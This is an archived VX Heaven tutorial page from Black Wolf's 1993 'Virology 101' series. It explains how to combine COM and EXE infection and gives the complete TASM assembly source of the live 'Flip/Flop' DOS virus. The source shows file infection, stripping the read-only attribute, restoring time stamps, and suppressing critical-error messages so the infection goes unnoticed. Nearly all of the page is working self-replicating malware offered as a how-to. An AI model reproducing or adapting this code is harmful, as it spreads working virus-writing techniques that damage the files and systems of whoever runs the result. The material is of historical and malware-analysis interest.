Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Combined Viruses

Black Wolf

[Back to index] [Comments]

Now that we have learned how to infect both COM and EXE files, it's time to look at some of the "details" that we haven't covered. Three main problems are apparent in the last two viruses that we need to fix. The first is that there is little or no error handling in the viruses. This can cause that wonderful "Disk Error. Abort, Retry, or Fail?" message to appear on a write protected disk, which is generally not desirable. The next problem is that both viruses can be stopped by the read-only attribute. This is not true with most viruses, nor should it be with ours. The last is the time/date stamp. When a file is written to and closed, DOS automatically sets the time and date fields to whenever it was closed, causing the new host to have a current time stamp. To avoid this, we must get the old stamp and reset it once we are done with the infection (just before closing the file). The next virus will still be direct-action, but it will employ all the above techniques and have the ability to infect both EXE and COM files. It will still remain in the current directory to make it safer to test, but aside from that it will be a fairly effective direct-action virus. The big things to notice are the methods to make as much of the code as possible usable for both .COM and .EXE infections, the error handler, and the attribue/time/date fixes. The virus is name the Flip/Flop because if it is attached to a COM file, it will only infect EXE files, whereas if it is attached to an EXE file it will only infect COM files.

; The Flip/Flop virus.
;
;This file is a direct action .COM/.EXE file infector written
;in TASM compatible 8086 assembly. It is presented as a part of
;VIROLOGY 101 (c) 1993 Black Wolf Enterprises. This is a live virus
;for educational purposes only. Please do not release it. Execute
;only on an isolated machine under controlled conditions.

;This virus also needs a four-byte stub to be attached to it after
;compilation. NOP's will work fine.

;One interesting characteristic of this virus is that if it is on
;an EXE file, it will infect .COM files, but if it is on a COM
;file, it will only search for EXE's. It will infect each
;uninfected file of whichever type chosen in the current directory
;on runtime.

.model tiny
.radix 16
.code
org 100
start:
COM_ENTRY:
call get_offset

lea si,[bp+storage_bytes] ;Restore original bytes to
mov di,100 ;host.
movsw
movsw

mov byte ptr [COM_EXE+bp],0 ;Remember host is COM file.
jmp short Main_Virus ;Go to main virus.

Enter_EXE:
push es ;Save current ES (and DS) registers
push cs cs
pop es ds ;Set ES = DS = CS

call get_offset
lea si,[Old_IP+bp]
lea di,[Save_IP+bp] ;Setup old variables for infection
movsw
movsw
movsw
movsw

mov byte ptr [COM_EXE+bp],1 ;Remember host is EXE file.
Main_Virus:
call Set_Handler

lea dx,[DTA+bp] ;Set DTA to new address
call Set_DTA

cmp byte ptr [COM_EXE+bp],1 ;If virus is on an .EXE,
jne Find_EXE ;infect COM files and
;vice-versa
Find_COM:
lea dx,[Com_mask+bp] ;Find a .COM file
jmp Find_First
Find_Exe:
lea dx,[Exe_mask+bp]
Find_First:
mov ah,4e
xor cx,cx
Find_File:
int 21
jc Outa_Files

xor ah,ah ;Get attributes into CX
lea dx,[DTA+1e+bp]
call do_attribs

mov word ptr [bp+attribs],cx ;Save attribs
xor cx,cx
mov al,1
call do_attribs ;Set attribs to normal

mov ax,3d02 ;Open file read/write
lea dx,[bp+DTA+1e]
int 21
jc Outa_Files

xchg bx,ax

mov al,0 ;Get and save time stamp
call Do_Time
mov word ptr [bp+Time],cx
mov word ptr [bp+Date],dx

mov ah,3f
mov cx,1a ;Read beginning of file
lea dx,[exe_header+bp] ;(header if .EXE)
int 21
jc Close_UP

call Check_Infected ;Is it infected?
jc Close_Up

cmp word ptr [exe_header+bp],'ZM' ;Is EXE?
je Infect_EXE ;go Infect EXE
cmp word ptr [exe_header+bp],'MZ'
je Infect_EXE

Infect_Com:
call Do_Com ;Infect COM file
jmp short Close_Up

Infect_Exe:
call Do_Exe ;Infect EXE

Close_Up:
mov al,01 ;Reset time stamp
mov cx,word ptr [bp+Time]
mov dx,word ptr [bp+Date]
call Do_Time

mov ah,3e ;Close file
int 21

mov al,01 ;Reset Attributes
mov cx,word ptr [bp+attribs]
lea dx,[DTA+1e+bp]
call Do_Attribs

mov ah,4f ;Find another file to infect...
jmp Find_File

Outa_Files:
call Reset_Handler ;Chose appropriate restore
cmp byte ptr [COM_EXE+bp],1 ;algorithm
je Restore_EXE

Restore_COM:
mov dx,80
call Set_DTA ;Reset DTA
mov di,100 ;jump 100
push di
ret

Restore_EXE:
pop es ;Restore seg registers
push es
pop ds

mov dx,80 ;Reset DTA
call Set_DTA

mov ax,es
add ax,10
add word ptr cs:[Save_CS+bp],ax
add ax,word ptr cs:[Save_SS+bp] ;Set SS:SP
;and go CS:IP
cli
mov ss,ax
mov sp,word ptr cs:[Save_SP+bp]
sti

db 0ea ;Far jump to CS:IP
Save_IP dw 0
Save_CS dw 0
Save_SS dw 0
Save_SP dw 0

Old_IP dw 0
Old_CS dw 0fff0
Old_SS dw 0fff0
Old_SP dw 0

Set_DTA:
mov ah,1a
int 21
ret

Do_attribs: ;Performs file attribute functions
mov ah,43
int 21
ret
Do_Time: ;Performs time stamp functions
mov ah,57
int 21
ret

Get_offset: ;Get diplacement of virus into BP
call next
next:
pop bp
sub bp,offset next
ret
Do_COM: ;Infect COM file
lea si,[exe_header+bp]
lea di,[storage_bytes+bp]
movsw
movsw

call Go_EOF

sub ax,3
mov word ptr [jump_bytes+1+bp],ax

call write_virus
call Go_BOF

mov ah,40
lea dx,[jump_bytes+bp] ;write in jump
mov cx,4
int 21
ret

Do_EXE:
call Save_Old_Header
call Go_EOF

push ax dx
call calculate_CSIP
pop dx ax

call calculate_size
call write_virus
call Go_BOF

mov ah,40
mov cx,1a
lea dx,[exe_header+bp] ;Write header
int 21
ret

Go_EOF: ;Go to end of file
mov ax,4202
jmp Move_FP
Go_BOF: ;Go to beginning of file
mov ax,4200
Move_FP:
xor cx,cx
xor dx,dx
int 21
ret

Write_Virus:
mov ah,40
mov cx,end_prog-start ;Append virus to file
lea dx,[bp+start]
int 21
ret

Save_Old_Header:
mov ax,word ptr [exe_header+bp+0e] ;Save old SS
mov word ptr [Old_SS+bp],ax
mov ax,word ptr [exe_header+bp+10] ;Save old SP
mov word ptr [Old_SP+bp],ax
mov ax,word ptr [exe_header+bp+14] ;Save old IP
mov word ptr [Old_IP+bp],ax
mov ax,word ptr [exe_header+bp+16] ;Save old CS
mov word ptr [Old_CS+bp],ax
ret

calculate_CSIP:
push ax
mov ax,word ptr [exe_header+bp+8] ;Get header length
mov cl,4 ;and convert it to
shl ax,cl ;bytes.
mov cx,ax
pop ax
sub ax,cx ;Subtract header
sbb dx,0 ;size from file
;size for memory
;adjustments
mov cl,0c ;Convert DX into
shl dx,cl ;segment Address
mov cl,4
push ax ;Change offset (AX) into
shr ax,cl ;segment, except for last
add dx,ax ;digit. Add to DX and
shl ax,cl ;save DX as new CS, put
pop cx ;left over into CX and
sub cx,ax ;store as the new IP.

add cx,Enter_EXE-start ;Adjust to go to EXE_Entry

mov word ptr [exe_header+bp+14],cx
mov word ptr [exe_header+bp+16],dx ;Set new CS:IP
mov word ptr [exe_header+bp+0e],dx ;Set new SS = CS
mov word ptr [exe_header+bp+10],0fffe ;Set new SP
mov byte ptr [exe_header+bp+12],'V' ;mark infection
ret

calculate_size:
push ax ;Save offset for later

add ax,end_prog-start ;Add virus size to DX:AX
adc dx,0

mov cl,7
shl dx,cl ;convert DX to pages
mov cl,9
shr ax,cl
add ax,dx
inc ax
mov word ptr [exe_header+bp+04],ax ;save # of pages

pop ax ;Get offset
mov dx,ax
shr ax,cl ;Calc remainder
shl ax,cl ;in last page
sub dx,ax
mov word ptr [exe_header+bp+02],dx ;save remainder
ret

Set_Handler:
mov ax,3524 ;Get Int 24 address
int 21 ;(Critical Error)
mov word ptr [IP_24+bp],bx
mov word ptr [CS_24+bp],es

mov ax,2524 ;Set Int 24
lea dx,[Int_24+bp]
int 21

push ds ;Restore ES
pop es
ret

Reset_Handler:
mov dx,word ptr cs:[CS_24+bp]
mov ds,dx
mov dx, word ptr cs:[IP_24+bp]
mov ax,2524 ;Reset handler to old one
int 21

push es ;restore DS.
pop ds
ret

Int_24: ;Return error code in al without
mov al,3 ;printing annoying message
iret

Check_Infected:
cmp byte ptr [exe_header+bp+3],'V' ;check .COM infected
je Is_Infected
cmp byte ptr [exe_header+bp+12],'V' ;check .EXE
je Is_Infected ;infected
clc
ret
Is_Infected:
stc
ret

Exe_mask db '*.EXE',0
Com_mask db '*.COM',0

jump_bytes db 0e9,0,0,'V' ;jump for COM's with ID

storage_bytes: ;Initial storage bytes
nop
nop
int 20

COM_EXE db 0 ;0 = COM, 1 = EXE
end_prog:
Time dw ?
Date dw ?
attribs dw ?
IP_24 dw ?
CS_24 dw ?
exe_header db 1a dup(?)
DTA:
end start
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua